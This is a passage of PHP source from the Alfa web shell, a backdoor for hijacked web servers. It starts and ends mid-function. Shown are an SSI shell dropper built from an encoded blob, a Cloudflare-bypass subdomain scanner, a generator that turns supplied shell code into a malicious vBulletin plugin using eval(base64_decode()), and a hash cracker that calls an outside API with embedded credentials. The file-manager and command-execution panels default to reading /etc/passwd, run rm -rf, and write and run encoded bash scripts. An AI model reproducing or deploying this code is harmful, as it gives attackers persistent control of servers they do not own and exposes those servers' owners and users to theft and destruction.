		$realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
		alfaWriteTocgiapi("getheader.alfa",$bash);
		$data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);
		if(@is_array(@json_decode($data,true))){
			$_SESSION["updateheader_data"] = $data;
			echo $data;
		}
	}else{
		echo $_SESSION["updateheader_data"];
	}
}
function alfassiShell(){
alfahead();
echo '<div class=header>';
@mkdir('alfa_shtml',0755);
@chdir('alfa_shtml');
alfacgihtaccess('shtml');
$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
@__write_file('alfa_ssi.shtml',__get_resource($code));
@chmod("alfa_ssi.shtml",0755);
echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
echo '</div>';
alfafooter();
}
function alfacloudflare(){
alfahead();
AlfaNum(8,9,10,7,6,5,4,3);
echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
$url = $_POST['alfa1'];
if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
$url = preg_replace('/^(https?):\/\//', '', $url);
$url = "http://www.".$url;
}
$headers = @get_headers($url, 1);
$server = $headers['Server'];
$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
$url = explode($matches[0], $url);
$url = $url[1];}}
if(is_array($server))$server = $server[0];
echo __pre();
if(preg_match('/cloudflare/i', $server))
echo "\n[+] CloudFlare detected: {$server}\n<br>";
else
echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
echo "[+] Searching for more IP addresses.\n\n<br><br>";
for($x=0;$x<count($subs);$x++){
$site = $subs[$x] . $url;
$ip = is_ipv4(gethostbyname($site));
if($ip == '(Null)')
continue;
echo "Trying {$site}: {$ip}\n<br>";
}
echo "\n[+] Finished.\n<br>";
}
echo '</div>';
alfafooter();
}
function is_ipv4($ip){
return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
}
function __alert($s){
echo '<center>'.__pre().$s.'</center>';
}
function create_table($data){
echo '<table border="1">';
foreach ($data as $key => $val){
$array = array();
foreach($val as $k => $v){
$array[$k] = $v;
}
echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
}
echo '</table>';
}
function alfaphp2xml(){
alfahead();
AlfaNum(8,9,10,7,6,5,4,3);
echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
<input type='submit' name='go' value=' ' /></p></form></center>";
if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
echo '</textarea></center></p>';
}
echo '</center></div>';
alfafooter();
}
function alfacpcrack(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
if($_POST['alfa1']=='dec'){
$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
if($_POST['alfa3'] == '>>'){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$hash_type = $_POST['alfa4'];
$email = "solevisible@gmail.com";
$code = "7b9fa79f92c3cd96";
$target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
$resp = @file_get_contents($target);
if($resp==''){
$get = new AlfaCURL();
$resp = $get->Send($target);
}
echo __pre().'<center>';
switch($resp){
	case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
	case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
	case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
	case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
}
if(substr($resp,0,4)!='CODE'&&$resp!=''){
echo "<b>Result: <font color='green'>".$resp."</font></b>";
}elseif(substr($resp,0,4)!='CODE'){
echo "<font color='red'>NoT Found</font><br />";
}
echo('</center>');
}
}
}
if($_POST['alfa1']=='analyzer'){
echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
if($_POST['alfa3'] == '>>'){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$curl = new AlfaCURL();
$resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
echo(__pre().'<center>');
if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
	echo('<font color="green">'.$s[1].'</font>');
}else{
	echo('<font color="red">Not Found...!</font>');
}
echo('</center><br>');
}
}
}
echo '</div>';
alfafooter();
}
function alfafooter(){
if(!isset($_POST['ajax'])){
echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
<tr>
<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
<td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
<input type='hidden' name='a' value='FilesMAn'>
<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
<input type='hidden' name='alfa1' value='uploadFile'>
<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam &copy; 2012-".date('Y')." ]</span></td>
</tr>
</table>
</div>
<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>
<div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>
<div id='update-content'></div>
<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>
<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
<script>
	$('search-input').addEventListener('keydown', function(e){
		setTimeout(function(){
			var string = $('search-input').value
			d.getElementsByClassName('history-list')[0].innerHTML = '';
			for(var i in editor_files){
				if(editor_files[i].file.search(string) != -1 || string == ''){
					var mode = 0;
					if(i == editor_current_file){
						mode = ' is_active';
					}
					insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
				}
			}
		}, 100);
	},false);
	_Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
		d.body.insertAdjacentHTML('beforeend', res);
	});
	if(".$GLOBALS["need_to_update_header"]."){
		_Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){
			try{
				var data = JSON.parse(res);
				console.log(data);
				for(var i in data){
					var html = '';
					for(var b = 0; b < data[i].length; b++){
						if(i=='useful'||i=='downloader'){
							html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';
						}else{
							html += data[i][b];
						}
					}
					var elem = $('header_'+i);
					if(elem){elem.innerHTML = html;}
				}
				$('header_cgishell').innerHTML = 'ON';
				$('header_cgishell').setAttribute('class', 'header_on');
			}catch(e){console.log(e)}
		});
	}else if(islinux){
		_Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){
			if(res=='ok'){
				$('header_cgishell').innerHTML = 'ON';
				$('header_cgishell').setAttribute('class', 'header_on');
			}
		});
	}
</script>
</body>
</html>
";
}}
if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
function posix_getgrgid($p) {return false;} }
function alfaWhich($p) {
$path = alfaEx('which ' . $p,false,false);
if(!empty($path))
return strlen($path);
return false;
}
function alfaSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function alfaPerms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function alfaPermsColor($f,$isbash=false){
$class = "";
$num = "";
$human = "";
if($isbash){
$class = $f["class"];
$num = $f["num"];
$human = $f["human"];
}else{
$num = substr(sprintf('%o', @fileperms($f)),-4);
$human = alfaPerms(@fileperms($f));
if(!@is_readable($f))
$class = "main_red_perm";
elseif (!@is_writable($f))
$class = "main_white_perm";
else
$class = "main_green_perm";
}
return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}
function reArrayFiles($file_post){
$file_ary = array();
$file_count = count($file_post['name']);
$file_keys = array_keys($file_post);
for ($i=0; $i<$file_count; $i++) {
foreach ($file_keys as $key) {
$file_ary[$i][$key] = $file_post[$key][$i];
}
}
return $file_ary;
}
function _alfa_can_runCommand($cgi=true,$cache=true){
	if(isset($_SESSION["alfa_canruncmd"])&&$cache){
		return true;
	}
	if(strlen(alfaEx("whoami",false,$cgi))>0){
		$_SESSION["alfa_canruncmd"] = true;
		return true;
	}
	return false;
}
function _alfa_symlink($target, $link){
	$phpsym = function_exists("symlink");
	if($phpsym){
		@symlink($target, $link);
	}else{
		alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
	}
}
function _alfa_file_exists($file,$cgi=true){
	if(@file_exists($file)){
		return true;
	}else{
		if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
			return true;
		}
	}
	return false;
}
function _alfa_file($file,$cgi=true){
	$array = @file($file);
	if(!$array){
		if(strlen(alfaEx("id",false,$cgi))>0){
			$data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
			if(strlen($data)>0){
				return explode("\n", $data);
			}else{
				return false;
			}
		}else{
			return false;
		}
	}else{
		return $array;
	}
}
function _alfa_is_writable($file){
	$check = false;
	$check = @is_writable($file);
	if(!$check){
		if(_alfa_can_runCommand()){
			$check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
			if($check == "yes"){
				$check = true;
			}else{
				$check = false;
			}
		}
	}
	return $check;
}
function _alfa_is_dir($dir,$mode="-d"){
	$check = false;
	$check = @is_dir($dir);
	if(!$check){
		if(_alfa_can_runCommand()){
			$check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
			if($check == "yes"){
				return true;
			}else{
				return false;
			}
		}
	}
	return $check;
}
function alfaFilesMan(){
alfahead();
AlfaNum(8,9,10,7,6,5,4);
echo '<div class="ajaxarea"><div class="header">';
if(!empty ($_COOKIE['f']))
$_COOKIE['f'] = @unserialize($_COOKIE['f']);
if(!empty($_POST['alfa1'])){
switch($_POST['alfa1']){
case 'uploadFile':
if(isset($GLOBALS['glob_chdir_false'])){
	$alfa_canruncmd = _alfa_can_runCommand(true,true);
	$move_cmd_file = true;
}
$files = reArrayFiles($_FILES['f']);
foreach($files as $file){
if($move_cmd_file){
	alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
}else{
	@move_uploaded_file($file['tmp_name'],$file['name']);
}
echo "uped...!<Br>";
}
break;
case 'mkdir':
$new_dir_cmd = false;
if(isset($GLOBALS['glob_chdir_false'])){
	if(_alfa_can_runCommand(true,true)){
		alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
	}
}else{
if(!@mkdir(trim($_POST['alfa2'])))
echo "<b><font color='red'>Can't create new dir !</b></font>";
}
break;
case 'delete':
function deleteDir($path){
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = @opendir($path);
while(($item = @readdir($dh)) !== false){
$item = $path.$item;
if((basename($item) == "..") || (basename($item) == "."))
continue;
$type = @filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
@closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f){
if($f == '..')
continue;
$f = rawurldecode($f);
if(isset($GLOBALS["glob_chdir_false"])){
	if(_alfa_can_runCommand(true,true)){
		alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
	}
}else{
alfaEx("rm -rf '".addslashes($f)."'",false,false);
if(@is_dir($f))
deleteDir($f);
else
@unlink($f);
}
}
if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
deleteDir(rawurldecode(@$_POST['alfa2']));
alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
}else{
@unlink(rawurldecode(@$_POST['alfa2']));
}
if(isset($GLOBALS["glob_chdir_false"])){
	$source = rawurldecode(@$_POST['alfa2']);
	if($source!='..'&&!empty($source)){
		if(_alfa_can_runCommand(true,true)){
			alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
		}
	}
}
break;
case 'paste':
if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){
function copy_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
}elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){
function move_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if(($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
}elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
}elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$zipX = "alfa_".rand(1,1000).".zip";
if($zip->open($zipX, 1)){
@chdir($_SESSION['c']);
foreach($_SESSION['f'] as $f){
if($f == '..')continue;
if(@is_file($_SESSION['c'].$f))
$zip->addFile($_SESSION['c'].$f, $f);
elseif(@is_dir($_SESSION['c'].$f)){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
foreach($iterator as $key=>$value){
$key = str_replace('\\','/',realpath($key));
if(@is_dir($key)){
if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
}else{$zip->addFile($key,$key);}}}}
@chdir($GLOBALS['cwd']);
$zip->close();
__alert('>> '.$zipX.' << is created...');}}
}elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
foreach($_SESSION['f'] as $f) {
if($zip->open($_SESSION['c'].$f)){
$zip->extractTo($GLOBALS['cwd']);
$zip->close();}}}}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['alfa1'])){
$_SESSION['act'] = @$_POST['alfa1'];
$_SESSION['f'] = @$_POST['f'];
$_SESSION['c'] = @$_POST['c'];
}
break;
}
}
if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){
	$dirContent = @scandir($_SESSION[__LAST_CWD__]);
}else{
	$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
	if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
		$path = explode('/', $res[1]);
		array_pop($path);
		$_POST['c'] = implode('/', $path);
	}
	$_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);
}
$cmd_dir = false;
if($dirContent === false){
	if(_alfa_can_runCommand(true,true)){
		@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
		if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){
			$bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
			alfaWriteTocgiapi("getdir.alfa",$bash);
		}
		if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";
		$dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");
		$dirContent = json_decode($dirContent, true);
		if(is_array($dirContent)){
			array_pop($dirContent);
			$cmd_dir = true;
		}else{
			$dirContent = false;
		}
		$_SESSION["alfachdir_bash"] = true;
	}
}
if($dirContent == false){
echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
alfaFooter();
return;
}
global $sort;
$sort = array('name', 1);
if(!empty($_POST['alfa1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++){
if($cmd_dir){
$filename = $dirContent[$i]["name"];
$file_owner = $dirContent[$i]["owner"];
$file_group = $dirContent[$i]["group"];
$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
$file_size = $dirContent[$i]["size"];
$file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];
}else{
$filename = $dirContent[$i];
$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
$file_size = @filesize($GLOBALS['cwd'].$filename);
$file_path = $GLOBALS['cwd'].$filename;
}
$tmp = array('name' => $filename,
'path' => $file_path,
'modify' => $file_modify,
'perms' => $file_perm,
'size' => $file_size,
'owner' => $file_owner,
'group' => $file_group
);
if(!$cmd_dir){
if(@is_file($file_path))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($file_path))
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
elseif(@is_dir($file_path)&& ($filename != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}else{
	if($dirContent[$i]["type"]=="file"){
		$files[] = array_merge($tmp, array('type' => 'file'));
	}else{
		if($dirContent[$i]["name"] != "."){
